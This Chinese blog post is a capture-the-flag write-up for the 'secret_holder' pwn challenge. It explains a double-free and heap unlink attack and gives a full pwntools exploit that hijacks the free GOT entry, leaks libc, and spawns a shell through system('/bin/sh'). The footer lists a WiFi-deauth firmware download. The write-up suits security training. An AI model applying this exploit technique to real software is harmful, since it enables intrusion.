攻防世界PWN之secret_holder题解

最新推荐文章于 2022-04-06 22:09:52 发布
最新推荐文章于 2022-04-06 22:09:52 发布
阅读量1k 收藏
点赞数
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104216111
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

secret_holder

本题,附件在https://pwn-1253291247.cos.ap-chengdu.myqcloud.com/SecretHolder,刷题网站上没有提供

拿到附件,我们先检查一下程序的保护机制

然后,我们用IDA分析一下

Free后没有清空指针,可以造成多次重复free

可以多次创建堆,只要我们free后再创建即可

那么,本题,我们可以利用unsorted bin的unlink来攻击

我们先创建一个huge的堆,然后释放huge堆,再创建一个small的堆,再创建一个big堆

  1. #申请一个大chunk  
  2. new(3,'a'*0x100)  
  3. delete(3)  
  4.   
  5. #申请一个小chunk  
  6. new(1,'b'*0x10)  
  7. #申请一个中等chunk  
  8. new(2,'c'*0x100)  

那么,内存中,三个堆的布局是这样的

Huge(free)

 

Small(used)

Big(used)

 

接下来我们把Small和Big的都free掉,那么在large bin里,有Huge的地址,在fastbin里,有Small的地址,unsorted bin里的big合并到了top块里去了。由于堆指针依然保留着,我们可以double free那个Big块。当我们重新申请Huge的空间回来时,由于使用的是calloc,导致Huge内容全部被清空,也就是Small、Big的结构体信息也会没有了。我们要对Bigdouble free,因此我们既要在Small的位置伪造假chunk,也要重新构造好Big结构体,还有在Big后面再伪造几个假chunk,绕过检查

  1. #释放chunk0chunk1  
  2. delete(1)  
  3. delete(2)  
  4.   
  5. #构造假chunk  
  6. fake_chunk = p64(0) + p64(0x21)  
  7. #fd,bk  
  8. fake_chunk += p64(huge_secret-0x18) + p64(huge_secret-0x10)  
  9. payload = fake_chunk.ljust(0x20,'\x00')  
  10. #prev_size size  
  11. payload += p64(0x20) + p64(0x90) + 'c'*0x80 #chunk2  
  12. #prev_size size  
  13. payload += p64(0x90) + p64(0x81) + 'd'*0x70 #chunk3  
  14. #prev_size size  
  15. payload += p64(0) + p64(0x81) #chunk4  
  16. #重新申请large chunk,使得分配到的位置与chu  
  17. new(3,payload)  

现在,堆的布局是这样的

Huge(used)

 

Fake_chunk1(伪造free状态)

Big(free)

Fake_chunk3

Fake_chunk4

 

我们再次free那个Big,Big就会与Fake_chunk1发生unlink,而Fake_chunk3、Fake_chunk4是为了绕过边界检查。这样,我们就将large堆的指针指向了堆数组本身,我们就能自由的控制堆指针了。我们先把free的got表修改成puts的plt地址,这样,free时就能泄露出信息。

综上,我们的exp脚本

#coding:utf8
from pwn import *
from LibcSearcher import *

sh = process('./SecretHolder')
#sh = remote('111.198.29.45',58439)
elf = ELF('./SecretHolder')
#huge_secret指针的地址
huge_secret = 0x6020A8
bss_addr = 0x602090
free_got = elf.got['free']
puts_plt = elf.plt['puts']
read_got = elf.got['read']

def new(h_type,content):
   sh.sendlineafter('3. Renew secret','1')
   sh.sendlineafter('3. Huge secret',str(h_type))
   sh.sendlineafter('Tell me your secret:',content)

def delete(h_type):
   sh.sendlineafter('3. Renew secret','2')
   sh.sendlineafter('3. Huge secret',str(h_type))

def edit(h_type,content):
   sh.sendlineafter('3. Renew secret','3')
   sh.sendlineafter('3. Huge secret',str(h_type))
   sh.sendafter('Tell me your secret:',content)

#申请一个大chunk
new(3,'a'*0x100)
delete(3)

#申请一个小chunk
new(1,'b'*0x10)
#申请一个中等chunk
new(2,'c'*0x100)

#释放chunk0和chunk1
delete(1)
delete(2)

#构造假chunk
fake_chunk = p64(0) + p64(0x21)
#fd,bk
fake_chunk += p64(huge_secret-0x18) + p64(huge_secret-0x10)
payload = fake_chunk.ljust(0x20,'\x00')
#prev_size size
payload += p64(0x20) + p64(0x90) + 'c'*0x80 #chunk2
#prev_size size
payload += p64(0x90) + p64(0x81) + 'd'*0x70 #chunk3
#prev_size size
payload += p64(0) + p64(0x81) #chunk4
#重新申请large chunk,使得分配到的位置与chu
new(3,payload)

#unlink 3这个large bin
delete(2)
#现在,我们可以自由控制三个堆指针了,先修改三个堆指针
payload = p64(0) * 2 + p64(free_got) + p64(bss_addr) + p64(read_got) + p32(1)*3
edit(3,payload)

#修改free的got表为puts的plt
edit(2,p64(puts_plt))
#泄露read的地址
delete(1)
sh.recvuntil('\n')
read_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
libc = LibcSearcher('read',read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
print 'libc_base=',hex(read_addr)
print 'system_addr=',hex(system_addr)
#修改free的got表内容,指向system
edit(2,p64(system_addr))
#修改堆1指针,指向/bin/sh字符串
edit(3,p64(0) * 2 + p64(binsh_addr))
#system("/bin/sh")
delete(2)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界pwn题 -- secret file 题解
lifanxin的博客
12-24 880
Write Up知识点关键字样本运行静态分析程序逻辑求解脚本 知识点关键字 栈溢出,popen函数,openssl sha256函数 样本 样本来自攻防世界pwn题 – secret file 运行 查看文件属性   所有保护全开 运行样本程序   本地运行会报一个错误即缺少一个libc动态链接库   该库是openssl开源库,用来实现一些加密算法的,这里给出libcrypto.so.1.1,报错的可以添加到自己本地,使用如下代码在本地/usr/lib下创建一个软链接就行。 ln -s libcrypt
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
攻防世界 pwn 进阶 secret_holder
yongbaoii的博客
02-18 339
进去给了个网站让我自己下载附件,找半天没找到,最终还是嫖了个现成的。 https://pwn-1253291247.cos.ap-chengdu.myqcloud.com/SecretHolder 看一手保护,PIE没有开,还好,RELRO也没有全开,第一想法可以考虑劫持一手GOT表。 又是菜单题,主程序简单,且有循环。 程序很简单,三个秘密,然后地址跟flag都在bss段上,分别占了八个跟四个字节。 同时calloc函数跟malloc函数一样,申请空间,区别是calloc函数会把申请到得空间都清零。
攻防世界-PWN-secret_holder-Unlink
aptx4869_li的博客
04-06 427
解题思路 保护机制 题目文件见文末连接,攻防世界平台上下载下来的不知道是啥东西 healer@healer-virtual-machine:~/Desktop/secret_holder$ checksec SecretHolder [*] '/home/healer/Desktop/secret_holder/SecretHolder' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found
攻防世界secret_file
weixin_43960998的博客
03-28 460
1.程序逆向 感觉这题的绝大部分难度在逆向上,可以逆个大概然后动调就ok了。 刚一看到有点懵,直接看看让干什么:     最终需要我们满足 v15 和 v17 的值相等。     往前找看看 v15 和 v17 分别是什么。通过在栈中的关系看到,v15 在第一个函数里面进行了赋了一个 hash 值: 此后再也没变过。再看 v17: DD0函数做了一个 SHA256,结果应该是存放在了 v16 中, 然后把结果的每个字符转
[XCTF-pwn] 35_hitcon-ctf-2016_secret_holder
weixin_52640415的博客
03-10 272
区块会因为top_chunk不够大在新地址新建,释放后收回,这时建小块在旧地址释放,再建巨块时会在旧地址扩充。 程序未开pie,free时只清标记,但free时不检查标记,可以UAF。 思路: 建巨块释放建小块释放再建巨块(在旧堆块,与小块同一块) 由于未删指针,此时小块巨块指针相同,释放小块实然上是释放大块,大块标记保留。 建小块和大块,通过巨块指针修改小块和大块头unlink 控制指针区后随便搞。 完整exp: from pwn import * local = 0 if local
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
secret_file
12-24
攻防世界pwn题,该题虽然最终解题脚本比较简单,但分析过程还是比较中肯的,适合新人一同学习。解题wp链接:https://blog.csdn.net/A951860555/article/details/111601870
攻防世界 Pwn secret_file
MrTreebook的博客
02-26 245
攻防世界 Pwn secret_file1.checksec检查保护2.运行程序3.IDA分析4.程序逻辑5.exp6.运行结果 1.checksec检查保护 lwj@ubuntu:~/Desktop/git/ctf-pwn/secret_file$ checksec secret_file [*] '/home/lwj/Desktop/git/ctf-pwn/secret_file/secret_file' Arch: amd64-64-little RELRO: Full
攻防世界PWNsecret_file题解
seaaseesa的博客
11-10 1903
首先,我们看一下程序的保护机制 吓了一跳,几个关键保护全开。 然后,我们用IDA分析一下 好像很复杂的样子。以往的ROP这些都用不了。然而,只要这个条件成立,就可以执行popen了。 其中,我们发现v15是一个定值,在这里面被初始化,调试后发现是一个字符串9387a00e31e413c55af9c08c69cd119ab4685ef3bc8bcbe1cf82161119457127...
sharif ctf pwn t00p_secrets writeup
charlie_heng的专栏
02-09 471
这题在比赛的时候没做出来,现在回顾一下,发现其实漏洞挺多的,而且还挺好用的…..(打比赛的时候真的是当局者迷,旁观者清…. 漏洞: 主要的漏洞有两个,两个漏洞都可以分别达到任意内存写,任意内存读的效果 1. 堆off-by-one 当选择字符串的类型的时候,会将读取的字符串后的那个字节置为0,当读取的字符完全占满malloc申请的内存之后,会将下一个堆的size的一个字节置为0 ...
(unlink) HITCON CTF 2016 : Sleepy Holder
qq_36918532的博客
01-20 309
今天仍然是复习unlink的原理和利用过程 这个跟Secret Holder类似的,只不过huge secret一旦创建就无法删除了和修改了(我之前写payload时候忘记了,还delete(3)。。。) 安全检查之后拖到IDA里面:菜单题 free功能好像没什么毛病 修改功能好像也没什么问题(难道问题在分配里面) 看到分配功能,也就是三个秘密分配,也没有什么分配函数读取越界溢出,或者off-by-null漏洞 然后大致只得到了,分配通过flag的位置是否为1,来判断的并且其相对的布局分别是 0x602
攻防世界新手区刷题日记
Ching_jen的博客
02-22 1221
1、get_shell 打开题目,发现有一个题目场景,然后看题目描述说运行就能拿到shell,所以先运行一下,看看会发生什么,在虚拟机终端上输入nc+ip地址+ip端口(连接该网址),然后输入cat flag 发现运行一下flag就真的出来了。 2.CDfsb 这道题也给了一个题目场景,先尝试上面的方法将其运行一下,看看会发生什么 结果并不像上题这么直接,该题还给了一个附件,将其下载下来,先用...
CTF-Pwn-[BJDCTF 2nd]secret
归子莫的博客
05-06 1485
CTF-Pwn-[BJDCTF 2nd]secret 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]secret 下载题目文件 secret 思路 老规矩使用file...
ctf赛题secret.php,CTF赛题全解之CTF成长之路(三)
weixin_39594312的博客
03-12 763
1.题目名称:BuyFlag打开页面发现有个payflag的页面点进去查看源代码发现注释中有代码判断password参数是否是404,这里利用了is_numeric函数来进行判断所以提交404%20即可绕过is_numeric的判断。又要求必须是学生才行,这里看到cookie的user字段。这里我们改为1再进行提交。通过判断一开始在源代码中的代码,我们添加money参数,将参数设置为flag的价格...
buuctf——SecretFile
qq_51796436的博客
03-05 938
进来就看见有大佬被挂在黑页 F12查看源码看到在下面有个黑化了的标签藏得挺深,./Archive_room.php。然后网页中间有个 不知道的还以为在FBI warning.点进去看看,注意到直接来到了end.php,但是在上一页的源码这个secret的herf是跳转至action.php啊。应该是action.php302跳转到了end.php吧,开burp看看 事实证明确实有action.php repeater发包后在响应包看到有secr3t.php,拿到题目源码: <html>
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值